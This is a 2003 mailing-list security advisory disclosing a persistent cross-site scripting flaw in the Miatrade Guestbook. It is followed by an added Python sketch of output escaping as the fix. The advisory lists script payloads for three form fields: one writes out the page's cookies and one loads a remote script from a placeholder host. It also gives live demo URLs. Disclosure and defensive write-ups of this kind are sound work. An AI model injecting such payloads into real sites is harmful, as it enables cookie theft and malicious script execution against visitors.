Message-ID: <Law11-OE14aEfU61Y2F0002c64a@hotmail.com>
Date: Sun, 24 Aug 2003 15:12:15 -0700
From: "morning_wood" <se_cur_ity@...mail.com>
To: <bugtraq@...urityfocus.com>, <full-disclosure@...ts.netsys.com>
Subject: Miatrade Guestbook - Persistant XSS
------------------------------------------------------------------
- EXPL-A-2003-021 exploitlabs.com Advisory 021
------------------------------------------------------------------
-= Miatrade Guestbook =-
Aug 20, 2003
Donnie Werner
morning_wood@...loitlabs.com
Product:
--------
Miatrade guestbook
http://www.miatrade.com
http://www.google.com/keyword/Miatrade+Guestbook
Vulnerability:
----------------
1. persistent XSS
Description of product:
-----------------------
"Miatrade Guestbook gives you the ability to gather information
from your visitors. They can post a public message that
may include: Name, E-mail, url, Home page and Comments
about your site.
Miatrade guestbook lets you keep in touch with who's visiting
your site and is a great way to make your site more
interactive and keep visitors coming back."
VULNERABILITY / EXPLOIT
======================
Miatrade guestbook does not filter HTML code from user-supplied
input. A remote user can create a specially crafted URL that,
when loaded by a target user, will cause arbitrary scripting
code to be executed by the target user's browser. The code will
originate from the site running the Miatrade guestbook software
and will run in the security context of that site.
Persistent XSS is rendered in these fields:
[name] - <script>alert("You are vunerable to xss")</script>
[homepage] - <script>document.write(document.cookie)</script>
[message] - <script language="JavaScript"
src="http://someremote-url/nasty.js" type="text/javascript"></script>
live examples:
demo - sign
http://www.miatrade.com/cgi-bin/guest/sign.pl?fibi
demo - view
http://www.miatrade.com/cgi-bin/guest/view.pl?fibi
Local:
------
no
Remote:
-------
yes
Vendor Fix:
-----------
No fix on 0day
Vendor Contact:
---------------
Concurrent with this advisory
info@...trade.com
Credits:
--------
Donnie Werner
co-founder / CTO
e2-labs.com
morning_wood@...labs.com
http://exploitlabs.com
http://nothackers.org/about.php
Original advisory at
http://exploitlabs.com/files/advisories/EXPL-A-2003-021-miatrade-gb.txt
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
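
Added example (not part of the original advisory, and not Miatrade's code): a sketch of the missing output filtering, applied to the three field values listed above. It is written in Python rather than the guestbook's Perl, and the names render_entry, safe_homepage and the benign sample entry are assumptions made for illustration.

```python
import html
from urllib.parse import urlsplit

# The three field values listed in the advisory, stored as a visitor would submit them.
ADVISORY_ENTRY = {
    "name": '<script>alert("You are vunerable to xss")</script>',
    "homepage": "<script>document.write(document.cookie)</script>",
    "message": '<script language="JavaScript" '
               'src="http://someremote-url/nasty.js" type="text/javascript"></script>',
}
# Constructed benign entry, to show ordinary input still renders normally.
BENIGN_ENTRY = {"name": "Ann & Bob", "homepage": "http://example.org/",
                "message": "Nice site!\nThanks."}


def safe_homepage(value):
    """Return value only if it is an absolute http(s) URL, otherwise None."""
    value = value.strip()
    if any(ch.isspace() or ord(ch) < 0x20 for ch in value):
        return None  # no embedded whitespace or control characters
    try:
        parts = urlsplit(value)
    except ValueError:
        return None
    if parts.scheme.lower() in ("http", "https") and parts.netloc:
        return value
    return None  # rejects javascript:, data:, and non-URL text


def render_entry(entry):
    """Build the HTML for one stored entry, encoding every field on output."""
    name = html.escape(entry.get("name", ""), quote=True)
    message = html.escape(entry.get("message", ""), quote=True).replace("\n", "<br>")
    url = safe_homepage(entry.get("homepage", ""))
    if url:
        href = html.escape(url, quote=True)  # still encoded for the attribute
        link = '<a href="{0}" rel="nofollow noopener">{0}</a>'.format(href)
    else:
        link = "(no homepage)"
    return '<div class="entry"><b>{}</b> {}<p>{}</p></div>'.format(name, link, message)


if __name__ == "__main__":
    print(render_entry(ADVISORY_ENTRY))
    print(render_entry(BENIGN_ENTRY))
```

Encoding happens when the entry is written into the page, so entries already stored before the change are rendered inert as well.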